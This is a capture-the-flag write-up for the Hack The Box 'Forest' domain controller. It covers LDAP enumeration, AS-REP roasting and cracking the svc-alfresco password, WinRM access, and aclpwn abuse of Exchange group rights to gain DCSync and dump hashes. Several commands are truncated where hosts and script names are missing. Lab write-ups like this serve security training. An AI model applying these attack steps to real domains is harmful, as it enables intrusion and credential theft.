Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. <John Lambert>


Forest is an "Easy" difficulty Windows machine. It is a Windows Domain Controller (DC) and installed an Exchange server, it requires the DC enumeration technique and Kerberos knowledge.

Anonymous LDAP can be used to access the DC server and enumerate domain objects. A service account was found in which the Kerberos pre-authentication disabled, it can be cracked to gain the initial access. This service was a member of the "Account Operators" group, which can be used to create a privileged Exchange account.

Finally, this privileged account was leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.

Penetrating Methodology:

Service Scanning

  • Nmap


  • Kerberos

  • SMB: smbclient, smbmap, enum4linux

  • Ldap: ldapsearch

  • NTLM: impacket/GetNPUsers


  • Password Crack: John

  • SMB connection: impacket/smbexec

Getting Less Privilege Shell

  • Evil-winrm.rb

  • Check vulnerability: sherlock.ps1

  • secretsdump


Target machine:

Attacking (Hacker) machine:

Hacking Process Part 0 – Service Scanning

The target machine IP is Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Quick Pre-searching

nmap, quick scan to get the opened port list

0.2) Details Analysis

Enumeration strategies

  1. LDAP - Port 389

  2. SMB - Port 135

  3. Kerberos - Port 88

Hacking Process Part 1 – Enumeration

enum4linux, get the basic information of the target machine

1.1) Strategy 1 Check port 389 LDAP Enumeration

  • nmap -p 389 --script ldap-rootdse

  • ldapsearch -x -h -b "DC=htb,DC=local"

Keep this information for later use

Domain: HTB with the following user

  • HTB\sebastien

  • HTB\lucinda

  • HTB\svc-alfresco

  • HTB\andy

  • HTB\mark

  • HTB\santi

1.2) Strategy 2 - Check SMB

Anonymous SMB login does not allow, SMB service does not available if no user credential

smbclient -I -L andy

smbmap -R Replication -H

1.4) Strategy 3 Kerberos

Using the kerbrute to evaluate those user accounts found at above

../../../tools/win/kerbrute/ -domain htb.local -users ./user.list -passwords /usr/share/wordlists/rockyou.txt -outputfile forest_passwords.txt

It finds that the svc-alfresco account is “not preauth” account. Try to get the TGT using getNPUsers

Add the to hosts file for the htb.local and try again

Cracking AS-REP Hashes with HashCat/John


john --wordlist=/usr/share/wordlists/rockyou.txt alfresco.tgt

python ../../../tools/win/impacket-0.9.20/examples/ htb.local/svc-alfresco:s3rvice

Get the password of svc-alfresco

Hacking Process Part 2 – Exploitation

2.1) Exploitation

The password of svc_alfresco is confirmed, but it cannot be accessed by SMB

../../../tools/win/impacket-0.9.20/examples/ htb.local/svc-alfresco:s3rvice@ net user

Hacking Process Part 3 – Getting Low Privilege Access

3.1) WinRM

Test the WinRM (Windows Remote Management) service using the account


Get the low privilege access, check the flag

Check the svc-alfresco is not the local administrators group

3.1) Enumeration

No Vulnerability found


Cannot get the ntlm hash using the account using secretsdump

4.1) Sherlock to find the vulnerability of the system

Objective: from SVC-aldresco to HTB.local

aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -dry -s -u svc-alfresco -p s3rvice

aclpwn -f svc-alfresco -ft user -d htb.local -t htb.local -s -u svc-alfresco -p s3rvice


Reference Link

What is kerberos and how to attack it.

Last updated